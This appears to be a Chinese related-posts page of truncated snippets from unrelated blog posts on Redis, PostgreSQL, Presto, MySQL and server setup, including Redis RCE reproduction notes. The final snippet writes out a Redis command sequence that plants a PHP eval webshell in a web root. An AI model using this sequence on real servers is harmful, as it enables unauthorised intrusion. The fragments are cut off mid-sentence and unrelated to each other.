0x00 前言 最近期末考试,博客好久没有更新了,这段时间爆了三四个洞,趁着还没去实习,抓紧复现一下,这次复现的是Redis的RCE,复现过程中也遇到很多问题,记录下来和大家分享一下 0x01 拉取镜像 docker确实是个好东西,有了它复现节省不少时间,首先拉取一个5.0镜像 docker search redis5.0 //查找镜像docker pull damonevking/redis5.0 //拉取下图第三个镜像 0x02 运行环境 运行容器 docker run -p 6379:63…

前情提要: 最近接了大数据项目的postgresql运维,刚接过来他们的报表系统就出现高峰期访问不了的问题,报表涉及实时数据和离线数据,离线读pg,实时读redis.然后自然而然就把redis也挪到我们这边优化了 -_-! .在这次优化过程中也是再次深刻感受到redis的各种坑 现象: 大数据报表周末晚上高峰期实时报表打不开,基本上处于不能使用状态,实时报表主要访问redis数据,监控发现Redis CPU占用过高,高峰期2个从库实例的CPU达到100%,由于redis是单进程单线程结构,所以单…

redis 和postgresql区别以及其优缺点 一刹那者为一念,二十念为一瞬,二十瞬为一弹指,二十弹指为一罗预,二十罗预为一须臾,一日一夜有三十须臾. 那么,经过周密的计算,一瞬间为0.36 秒,一刹那有 0.018 秒.一弹指长达 7.2 秒. redis和postgresql区别: pg是一个关系数据库,二redis是键值存储.   redis为单线程,单线程一个线程定时写入数据到磁盘.可以设置写入数据量,比如多个客户端一次写入了10000条数据那我就1秒钟写一次,一次写入量为1000条…

目录 一.简介 一.简介 前情提要: 最近接了大数据项目的postgresql运维,刚接过来他们的报表系统就出现高峰期访问不了的问题,报表涉及实时数据和离线数据,离线读pg,实时读redis.然后自然而然就把redis也挪到我们这边优化了 -_-! .在这次优化过程中也是再次深刻感受到redis的各种坑 现象: 大数据报表周末晚上高峰期实时报表打不开,基本上处于不能使用状态,实时报表主要访问redis数据,监控发现Redis CPU占用过高,高峰期2个从库实例的CPU达到100%,由于redis…

Vulhub 漏洞学习之:Redis 1 Redis简介 Redis 是完全开源的,遵守 BSD 协议,是一个高性能的 key-value 数据库.Redis 与其他 key - value 缓存产品有以下三个特点: Redis支持数据的持久化,可以将内存中的数据保存在磁盘中,重启的时候可以再次加载进行使用. Redis不仅仅支持简单的key-value类型的数据,同时还提供list,set,zset,hash等数据结构的存储. Redis支持数据的备份,即master-slave模式的数据备份…

前面我们已安装好了python服务器运行所需要的相关软件,而最重要最繁琐的就是参数配置,写这篇就踩了好多坑,花了好多时间,遇到了各种各样的问题.好了费话少说,直接进入本篇话题. PS:本人不是专业的运维,很多linux服务器的问题都是一知半解,只能根据自己的研究弄弄单机版的python web服务器,而对于多服务器自动化同步的部署.服务器的监控.Linux服务器的安全.服务器的调优(很多服务安装不是重点,能将各种参数运用配置到洽到好处才是难点),大家最好找专业的运维工程师小戴同学问问,问我的话我…

presto简单介绍 presto是一个分布式的sql交互式查询引擎.可以达到hive查询效率的5到10倍.支持多种数据源的秒级查询. presto是基于内存查询的,这也是它为什么查询快的原因.除了基于内存,presto还使用了 向量计算, 动态编译执⾏计划 优化的ORC和Parquet Reader技术 从而优化查询的速度. presto和hive的对比hive和presto是针对不同使用场景的.presto虽然查询很快,但是也不是适用于所有的查询场景.比如做多张大表的关联查询,由于prest…

1.MySQL简介 1.数据库产品演变 第一代数据库架构: RDBMS 关系型数据库时代 : 合的时代 代表产品 :Oracle .MSSQL .MySQL.SQL server 第二代数据库架构:拆的时代 NoSQL : Not Only SQL 时代 代表产品: Redis .MongoDB.ES 第三代数据库架构: 合的时代 NewSQL :新型数据库架构时代 代表产品: 阿里系列: OB .PolarDB Pincap : TiDB google : spanner 2.常见数据库产品介…

algernon 看到github 的介绍很很强大,一下子想到了openresty,功能看着很强大,支持 redis pg lua markdown quic http2 mysql 限速 pongo2 sass(scss) web 相关的 jsx (js dsl 模板写法) 说明 看官方介绍和很强大,有时间了运行下,代码也比较规整,可以学习下 参考资料 https://github.com/xyproto/algernon        …

攻击场景: 能够访问远程redis的端口(直接访问或者SSRF) 对redis服务器可以访问到的另一台服务器有控制权 实际上就是通过主从特性来 同步传输数据,同时利用模块加载来加载恶意的用来进行命令执行的函数,从而进行rce redis之前的攻击方法有 1.写shell CONFIG SET dir /VAR/WWW/HTML CONFIG SET dbfilename sh.php SET PAYLOAD '<?php eval($_GET[0]);?>' SAVE 但是对于网站根目录而言,…